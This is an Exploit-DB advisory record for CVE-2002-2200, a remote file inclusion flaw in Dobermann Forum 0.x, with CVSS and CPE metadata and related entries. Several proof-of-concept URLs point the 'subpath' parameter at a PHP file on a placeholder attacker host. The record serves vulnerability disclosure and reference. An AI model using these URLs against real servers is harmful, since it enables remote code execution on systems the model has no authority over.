Benjamin Lefevre Dobermann Forum 0.x index.php subpath Parameter Remote File Inclusion
2002-10-28T00:00:00
ID EDB-ID:21969 Type exploitdb Reporter frog Modified 2002-10-28T00:00:00
Description
Benjamin Lefevre Dobermann Forum 0.x index.php subpath Parameter Remote File Inclusion. CVE-2002-2200. Webapps exploit for php platform
source: http://www.securityfocus.com/bid/6057/info
Dobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter.
http://[target]/index.php?subpath=http://[attacker]/banniere.php
{"id": "EDB-ID:21969", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Benjamin Lefevre Dobermann Forum 0.x index.php subpath Parameter Remote File Inclusion", "description": "Benjamin Lefevre Dobermann Forum 0.x index.php subpath Parameter Remote File Inclusion. CVE-2002-2200. Webapps exploit for php platform", "published": "2002-10-28T00:00:00", "modified": "2002-10-28T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/21969/", "reporter": "frog", "references": [], "cvelist": ["CVE-2002-2200"], "lastseen": "2016-02-02T17:40:41", "viewCount": 2, "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2016-02-02T17:40:41", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2002-2200"]}, {"type": "exploitdb", "idList": ["EDB-ID:21970", "EDB-ID:21968", "EDB-ID:21967"]}], "modified": "2016-02-02T17:40:41", "rev": 2}, "vulnersScore": 7.0}, "sourceHref": "https://www.exploit-db.com/download/21969/", "sourceData": "source: http://www.securityfocus.com/bid/6057/info\r\n \r\nDobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. \r\n\r\nhttp://[target]/index.php?subpath=http://[attacker]/banniere.php", "osvdbidlist": ["60067"]}
{"cve": [{"lastseen": "2020-10-03T11:37:01", "description": "Benjamin Lefevre Dobermann FORUM 0.5 and earlier allows remote attackers to remotely include and execute malicious PHP files via the \"subpath\" variablein (1) entete.php, (2) enteteacceuil.php, (3) index.php, or (4) newtopic.php.", "edition": 3, "cvss3": {}, "published": "2002-12-31T05:00:00", "title": "CVE-2002-2200", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2002-2200"], "modified": "2008-09-10T19:16:00", "cpe": ["cpe:/a:benjamin_lefevre:dobermann_forum:0.5", "cpe:/a:benjamin_lefevre:dobermann_forum:0.4", "cpe:/a:benjamin_lefevre:dobermann_forum:0.2", "cpe:/a:benjamin_lefevre:dobermann_forum:0.1", "cpe:/a:benjamin_lefevre:dobermann_forum:0.3"], "id": "CVE-2002-2200", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-2200", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:benjamin_lefevre:dobermann_forum:0.2:*:*:*:*:*:*:*", "cpe:2.3:a:benjamin_lefevre:dobermann_forum:0.3:*:*:*:*:*:*:*", "cpe:2.3:a:benjamin_lefevre:dobermann_forum:0.4:*:*:*:*:*:*:*", "cpe:2.3:a:benjamin_lefevre:dobermann_forum:0.5:*:*:*:*:*:*:*", "cpe:2.3:a:benjamin_lefevre:dobermann_forum:0.1:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2016-02-02T17:40:50", "description": "Benjamin Lefevre Dobermann Forum 0.x newtopic.php subpath Parameter Remote File Inclusion. CVE-2002-2200 . Webapps exploit for php platform", "published": "2002-10-28T00:00:00", "type": "exploitdb", "title": "Benjamin Lefevre Dobermann Forum 0.x newtopic.php subpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-2200"], "modified": "2002-10-28T00:00:00", "id": "EDB-ID:21970", "href": "https://www.exploit-db.com/exploits/21970/", "sourceData": "source: http://www.securityfocus.com/bid/6057/info\r\n \r\nDobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter.\r\n\r\nhttp://[target]/newtopic.php?subpath=http://[attacker]/banniere.php ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21970/"}, {"lastseen": "2016-02-02T17:40:23", "description": "Benjamin Lefevre Dobermann Forum 0.x entete.php subpath Parameter Remote File Inclusion. CVE-2002-2200. Webapps exploit for php platform", "published": "2002-10-28T00:00:00", "type": "exploitdb", "title": "Benjamin Lefevre Dobermann Forum 0.x entete.php subpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-2200"], "modified": "2002-10-28T00:00:00", "id": "EDB-ID:21967", "href": "https://www.exploit-db.com/exploits/21967/", "sourceData": "source: http://www.securityfocus.com/bid/6057/info\r\n\r\nDobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. \r\n\r\nhttp://[target]/entete.php?subpath=http://[attacker]/banniere.php\r\n\r\nhttp://[target]/topic/entete.php?subpath=http://[attacker]/banniere.php", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21967/"}, {"lastseen": "2016-02-02T17:40:32", "description": "Benjamin Lefevre Dobermann Forum 0.x enteteacceuil.php subpath Parameter Remote File Inclusion. CVE-2002-2200 . Webapps exploit for php platform", "published": "2002-10-28T00:00:00", "type": "exploitdb", "title": "Benjamin Lefevre Dobermann Forum 0.x enteteacceuil.php subpath Parameter Remote File Inclusion", "bulletinFamily": "exploit", "cvelist": ["CVE-2002-2200"], "modified": "2002-10-28T00:00:00", "id": "EDB-ID:21968", "href": "https://www.exploit-db.com/exploits/21968/", "sourceData": "source: http://www.securityfocus.com/bid/6057/info\r\n \r\nDobermann Forum is prone to an issue which may allow remote attackers to include arbitrary files located on remote servers. This issue is present in several PHP script files provided with Dobermann. An attacker may exploit this by supplying a path to a file on a remote host as a value for the 'subpath' parameter. \r\n\r\nhttp://[target]/enteteacceuil.php?subpath=http://[attacker]/banniere.php", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/21968/"}]}
